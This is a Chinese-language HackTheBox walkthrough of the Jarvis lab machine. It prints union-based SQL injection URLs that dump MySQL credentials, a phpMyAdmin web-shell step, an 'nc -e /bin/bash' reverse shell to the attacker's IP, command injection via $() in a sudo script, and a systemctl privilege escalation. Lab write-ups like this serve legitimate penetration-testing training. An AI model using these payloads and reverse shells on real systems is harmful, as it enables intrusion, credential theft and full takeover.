HTB靶场记录之Jarvis

 

 

本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。

相关文章>>

HTB靶场记录之SolidState

HTB靶场记录之Arctic

HTB靶场记录之OpenAdmin

HTB靶场记录之Popcorn

HTB靶场记录之Europa

HTB靶场记录之Cronos

本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。

HTB是一个靶机平台,里面包含多种系统类型的靶机,并且很多靶机非常贴近实战情景,是一个学习渗透测试不错的靶场。

HTB靶场记录之Cronos

 1、靶机介绍

这次的靶机是Jarvis,很适合练手,难点在提权。

HTB靶场记录之Jarvis

 

2、信息收集

这里我先用autorecon进行信息收集。

Autorecon集成nmap,nikto等操作可以比较全面的进行端口扫描。

用法也比较简单,只需要python autrecon.py IP就可以了。

HTB靶场记录之Jarvis

 

同时会把报告保存成txt文件打开report即可,这次开了22和80端口。

HTB靶场记录之Jarvis

 

访问80端口正常回显,无需添加host文件。

HTB靶场记录之Jarvis

 

下一步开始用dirbuster挖掘目录信息,这次居然有一个phpmyadmin还有一些其它js,css页面。

HTB靶场记录之Jarvis

 

3、利用工具getshell一条龙

往下拉,然后再随机打开一个页面经典的?xxx=1。

HTB靶场记录之Jarvis

 

肌肉里面的sqlmap果断激活了,然而这个靶机是有WAF的,这个WAF有点奇怪。

你用sqlmap搞普通注入封你90S。但是你用sqlmap直接—os-shell(对注入成功的网站尝试写shell)顺便加个batch(自动填充)直接一步到位。

HTB靶场记录之Jarvis

 

最后直接出现个os-shell代表成功,同时输入whoami等命令皆可执行成功。

HTB靶场记录之Jarvis

 

但sqlmap的shell有时候输入其它的命令会进入死机状态,不会回显。所以需要添加一个新的反弹shell。

由于目标是一个Linux靶机,一般都配有python,所以我们可以参考一波这个各种语言:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

HTB靶场记录之Jarvis

 

这里要稍微修改一下IP和一个新的端口。

HTB靶场记录之Jarvis

 

同时需要开启nc,可以得到一个新的稳定shell。

HTB靶场记录之Jarvis

 

4、手工注入到getshell

手工注入对于脚本小子而言是一件比较折磨的事。

毕竟以前都是sqlmap跑,有WAF提高level级别。

不行就下一个更容易,现在重新复习回显错注入了。

手工注入这部分比较啰嗦,可以跳过这部分。

这里首先用最简单的不加任何单引号双引号括号屏蔽用and 1=1测试

10.10.10.143/room.php?cod=1 and 1=1#正常

HTB靶场记录之Jarvis

 

而换成1=2不正常,实锤有注入

10.10.10.143/room.php?cod=1 and 1=2#不正常

HTB靶场记录之Jarvis

 

接下来就是用order by测试

10.10.10.143/room.php?cod=1 order by 7#正常

10.10.10.143/room.php?cod=1 order by 8#不正常

HTB靶场记录之Jarvis

 

确认好字段数为7以后,需要用到union来爆破显错位,当然还是比较多的。

10.10.10.143/room.php?cod=1 union select 1,2,3,4,5,6,7#无报错点位

10.10.10.143/room.php?cod=-100 union select 1,2,3,4,5,6,7#有报错点位

HTB靶场记录之Jarvis

 

开始进入查数据库名阶段在2,3,4,5皆可把数字替换成关键词进行查询。这里我选择输出2作为替换点换成database()爆出一个数据库名出来。

10.10.10.143/room.php?cod=-100 union select 1,database(),3,4,5,6,7#得到一个数据库。

HTB靶场记录之Jarvis

 

这里我喜欢用group_concat功能,直接把所有数据库名都给拖出来。

10.10.10.143/room.php?cod=-100 union select 1,group_concat(schema_name),3,4,5,6,7 from
information_schema.schemata#得到所有数据库名。

HTB靶场记录之Jarvis

 

这里选择mysql库查看里面的内容(hotel里面的内容并不重要重要的是mysql库)。这里还是用group_concat,由于表太多了,只能复制到文本里面。

重要的是最后面有一个user表


http://10.10.10.143/room.php?cod=-100 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema='mysql'#查询mysql数据库里面的内容。

HTB靶场记录之Jarvis

 

开始查询user表里面的内容里面有2个关键词User和Password,果断选择它们。


http://10.10.10.143/room.php?cod=-100 union all select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='user'#查询user表里面的所有字段内容:

HTB靶场记录之Jarvis

 

最后只得到一个账号和密码


http://10.10.10.143/room.php?cod=-100 union all select 1,group_concat(User,Password),3,4,5,6,7 from mysql.user#查询所有user表里面所有关于User和Password字段的内容:

HTB靶场记录之Jarvis

 

找一个MD5在线解密成功。

HTB靶场记录之Jarvis

 

此时拿着我们的DBadmin和imissyou密码可以登录phpmyadmin。

同时我们可以点击SQL写一句话木马进去。

由于是Linux靶机可以大概确定绝对路径为/var/www/html

HTB靶场记录之Jarvis

 

此时在前端访问成功。

HTB靶场记录之Jarvis

 

把语句换为nc-e /bin/bash 10.10.14.23 6666,提前开启nc成功接收shell。

HTB靶场记录之Jarvis

 

5、提权变成正常用户

开始使用sudo -l发现一个pepper可执行的Python程序。

HTB靶场记录之Jarvis

 

先cd过去用cat看看里面的内容可用ping IP命令,多半可能存在命令执行。

HTB靶场记录之Jarvis

 

同时存在一些过滤符号。但这里没过滤全。比如$(命令)这条漏网之鱼不在那我们就可以利用了。

HTB靶场记录之Jarvis

 

写一个.sh文件里面包含基础的反弹语句,然后利用python模式开启共享模式(不用php的原因是传不上去..)。

HTB靶场记录之Jarvis

 

然后我们苟到/tmp目录下把文件接过来。记得用chmod 777给权限。否则可能运行不了。

HTB靶场记录之Jarvis

 

开始运行该脚本先输入-p然后输入一个正常的IP后面开始用$( )运行我们的反弹脚本。

HTB靶场记录之Jarvis

 

提前开启nc成功接收shell同时可以读取第一个flag。

HTB靶场记录之Jarvis

 

6、二次提权

这次sudo -l倒了只能换成find找找特殊权限,看到一个systemctl。

HTB靶场记录之Jarvis

 

关于提权信息可以参考gtfobin。

但这个网站需要小小的魔法帮助。

HTB靶场记录之Jarvis

 

但需要有一点更改。

我们这次运行的systemctl是一个.service文件类型的东西。

有点像文本一样,所以首先排除echo。其实在ExecStart那个变量最好更改成一个shell这样方便点。(这里我用回上面的python shell)。最后不需要变量$IF

HTB靶场记录之Jarvis

 

再次用wget传上去以后一定要用link连接否则执行不了。

现在开始启动:

HTB靶场记录之Jarvis

 

此时提前开好nc成功接回root的shell提权成功。

HTB靶场记录之Jarvis

 

Bastard属实折磨,三过而打不进去。

posted @ 2022-02-24 16:37  i春秋  阅读(87)  评论(0编辑  收藏  举报